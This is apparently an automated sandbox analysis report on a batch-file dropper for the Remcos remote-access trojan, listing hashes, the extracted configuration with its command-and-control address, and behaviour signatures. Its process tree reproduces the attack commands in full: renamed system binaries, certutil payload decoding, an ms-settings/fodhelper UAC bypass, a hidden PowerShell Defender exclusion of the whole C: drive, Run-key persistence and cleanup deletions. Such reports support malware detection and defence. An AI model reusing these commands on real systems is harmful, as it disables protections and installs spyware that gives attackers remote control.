Analysis
-
max time kernel
146s -
max time network
136s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
17-05-2024 10:46
Static task
static1
Behavioral task
behavioral1
Sample
1fbb038040043d4a427658fde2cbfd58557ab54b9d104cc70eecb2829f788263.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
1fbb038040043d4a427658fde2cbfd58557ab54b9d104cc70eecb2829f788263.bat
Resource
win10v2004-20240508-en
General
-
Target
1fbb038040043d4a427658fde2cbfd58557ab54b9d104cc70eecb2829f788263.bat
-
Size
2.7MB
-
MD5
71a2e0b401912d66e4562712b5af765e
-
SHA1
5a1b5442baab4f7247002ad14fe7ba54467c7b96
-
SHA256
1fbb038040043d4a427658fde2cbfd58557ab54b9d104cc70eecb2829f788263
-
SHA512
9439ca8bfbba2f104cc947e177dc98d14cbd9b579b535aadc446446fb6707ec8bd4ab22efd96e2f1dda4e73516ff68046fd4b3bf6bfbb98a7e52ab49416a8859
-
SSDEEP
24576:srxwK+DtoQXo3twW5xYRLgd9b+n7ARtI7zv2ziFjbxG4VuxBJGhRCpC:srxwK+DtpPW56s9b+n7ARi7zv2w9G5C
Malware Config
Extracted
remcos
RemoteHost
89.117.145.5:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-Z1AWP0
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Executes dropped EXE 24 IoCs
Processes:
alpha.exealpha.exealpha.exealpha.exekn.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exekn.exealpha.exePing_c.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exepid process 1984 alpha.exe 2224 alpha.exe 1244 alpha.exe 2536 alpha.exe 2716 kn.exe 2880 alpha.exe 2436 alpha.exe 2692 alpha.exe 2424 alpha.exe 1300 xkn.exe 3024 alpha.exe 1816 ger.exe 2664 alpha.exe 2516 kn.exe 2792 alpha.exe 1376 Ping_c.pif 1200 alpha.exe 812 alpha.exe 292 alpha.exe 1448 alpha.exe 1044 alpha.exe 2000 alpha.exe 1788 alpha.exe 1072 alpha.exe -
Loads dropped DLL 13 IoCs
Processes:
cmd.exealpha.exealpha.exexkn.exealpha.exepid process 2856 cmd.exe 2856 cmd.exe 2856 cmd.exe 2856 cmd.exe 2536 alpha.exe 2856 cmd.exe 2856 cmd.exe 2856 cmd.exe 2856 cmd.exe 2424 alpha.exe 1300 xkn.exe 1300 xkn.exe 3024 alpha.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Ping_c.pifdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\Htdihaig = "C:\\Users\\Public\\Htdihaig.url" Ping_c.pif -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 2804 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
ger.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command ger.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings ger.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell ger.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open ger.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 6 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
Ping_c.pifpid process 1376 Ping_c.pif -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
xkn.exePing_c.pifpid process 1300 xkn.exe 1376 Ping_c.pif -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
xkn.exetaskkill.exedescription pid process Token: SeDebugPrivilege 1300 xkn.exe Token: SeDebugPrivilege 2804 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exedescription pid process target process PID 2856 wrote to memory of 1456 2856 cmd.exe extrac32.exe PID 2856 wrote to memory of 1456 2856 cmd.exe extrac32.exe PID 2856 wrote to memory of 1456 2856 cmd.exe extrac32.exe PID 2856 wrote to memory of 1984 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 1984 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 1984 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 2224 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 2224 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 2224 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 1244 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 1244 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 1244 2856 cmd.exe alpha.exe PID 1244 wrote to memory of 2568 1244 alpha.exe extrac32.exe PID 1244 wrote to memory of 2568 1244 alpha.exe extrac32.exe PID 1244 wrote to memory of 2568 1244 alpha.exe extrac32.exe PID 2856 wrote to memory of 2536 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 2536 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 2536 2856 cmd.exe alpha.exe PID 2536 wrote to memory of 2716 2536 alpha.exe kn.exe PID 2536 wrote to memory of 2716 2536 alpha.exe kn.exe PID 2536 wrote to memory of 2716 2536 alpha.exe kn.exe PID 2856 wrote to memory of 2880 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 2880 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 2880 2856 cmd.exe alpha.exe PID 2880 wrote to memory of 2572 2880 alpha.exe extrac32.exe PID 2880 wrote to memory of 2572 2880 alpha.exe extrac32.exe PID 2880 wrote to memory of 2572 2880 alpha.exe extrac32.exe PID 2856 wrote to memory of 2436 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 2436 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 2436 2856 cmd.exe alpha.exe PID 2436 wrote to memory of 2864 2436 alpha.exe extrac32.exe PID 2436 wrote to memory of 2864 2436 alpha.exe extrac32.exe PID 2436 wrote to memory of 2864 2436 alpha.exe extrac32.exe PID 2856 wrote to memory of 2692 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 2692 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 2692 2856 cmd.exe alpha.exe PID 2692 wrote to memory of 2456 2692 alpha.exe extrac32.exe PID 2692 wrote to memory of 2456 2692 alpha.exe extrac32.exe PID 2692 wrote to memory of 2456 2692 alpha.exe extrac32.exe PID 2856 wrote to memory of 2424 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 2424 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 2424 2856 cmd.exe alpha.exe PID 2424 wrote to memory of 1300 2424 alpha.exe xkn.exe PID 2424 wrote to memory of 1300 2424 alpha.exe xkn.exe PID 2424 wrote to memory of 1300 2424 alpha.exe xkn.exe PID 1300 wrote to memory of 3024 1300 xkn.exe alpha.exe PID 1300 wrote to memory of 3024 1300 xkn.exe alpha.exe PID 1300 wrote to memory of 3024 1300 xkn.exe alpha.exe PID 3024 wrote to memory of 1816 3024 alpha.exe ger.exe PID 3024 wrote to memory of 1816 3024 alpha.exe ger.exe PID 3024 wrote to memory of 1816 3024 alpha.exe ger.exe PID 2856 wrote to memory of 2664 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 2664 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 2664 2856 cmd.exe alpha.exe PID 2664 wrote to memory of 2516 2664 alpha.exe kn.exe PID 2664 wrote to memory of 2516 2664 alpha.exe kn.exe PID 2664 wrote to memory of 2516 2664 alpha.exe kn.exe PID 2856 wrote to memory of 2792 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 2792 2856 cmd.exe alpha.exe PID 2856 wrote to memory of 2792 2856 cmd.exe alpha.exe PID 2792 wrote to memory of 2804 2792 alpha.exe taskkill.exe PID 2792 wrote to memory of 2804 2792 alpha.exe taskkill.exe PID 2792 wrote to memory of 2804 2792 alpha.exe taskkill.exe PID 2856 wrote to memory of 1376 2856 cmd.exe Ping_c.pif
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\1fbb038040043d4a427658fde2cbfd58557ab54b9d104cc70eecb2829f788263.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵PID:1456
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "2⤵
- Executes dropped EXE
PID:1984
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"2⤵
- Executes dropped EXE
PID:2224
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:2568
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\1fbb038040043d4a427658fde2cbfd58557ab54b9d104cc70eecb2829f788263.bat" "C:\\Users\\Public\\Ping_c.mp4" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\1fbb038040043d4a427658fde2cbfd58557ab54b9d104cc70eecb2829f788263.bat" "C:\\Users\\Public\\Ping_c.mp4" 93⤵
- Executes dropped EXE
PID:2716
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"3⤵PID:2572
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"3⤵PID:2864
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"3⤵PID:2456
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""5⤵
- Executes dropped EXE
- Modifies registry class
PID:1816
-
-
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 123⤵
- Executes dropped EXE
PID:2516
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
-
C:\Users\Public\Libraries\Ping_c.pifC:\Users\Public\Libraries\Ping_c.pif2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
PID:1376 -
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Ping_c.pif C:\\Users\\Public\\Libraries\\Htdihaig.PIF3⤵PID:2964
-
-
C:\Windows\SysWOW64\colorcpl.exeC:\Windows\System32\colorcpl.exe3⤵PID:2848
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"2⤵
- Executes dropped EXE
PID:1200
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"2⤵
- Executes dropped EXE
PID:812
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"2⤵
- Executes dropped EXE
PID:292
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1448
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1044
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2000
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1788
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1072
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
894KB
MD5a2749d1be508fa6598a7a328e117e20c
SHA15f208c710d73e3ff99a2204fe954830f78ed0301
SHA25624d07136c34aeda669dd6d6f63464bbcc9501ff196296ace6e69a972d31a8cf7
SHA5128749286189673e2349c66241c3112c23a092132d380b605bb21f4c998c470d210798ec9efac2b7f36503d7c859fea0f4ae2092541325154d8fbac3d11c415e82
-
Filesize
1.7MB
MD5e840d77e29c6093c411d3773def69d3a
SHA1a8938e6fa40a088b456a3f39f8e96f15c2b980fb
SHA256e8fd1824c00e608f08e6955ba4a2364b79cee19b4a05b3b5dff5ca13d56b36cd
SHA512524cf98e5a4648080394c1db586ca354601ef0c191ada905fee79950db0263ee818a37c86769cf261b666ed3cf736d0514575f2a998778d21eb45e47b7d5df5c
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
Filesize
73KB
MD59d0b3066fe3d1fd345e86bc7bcced9e4
SHA1e05984a6671fcfecbc465e613d72d42bda35fd90
SHA2564e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
SHA512d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119
-
Filesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2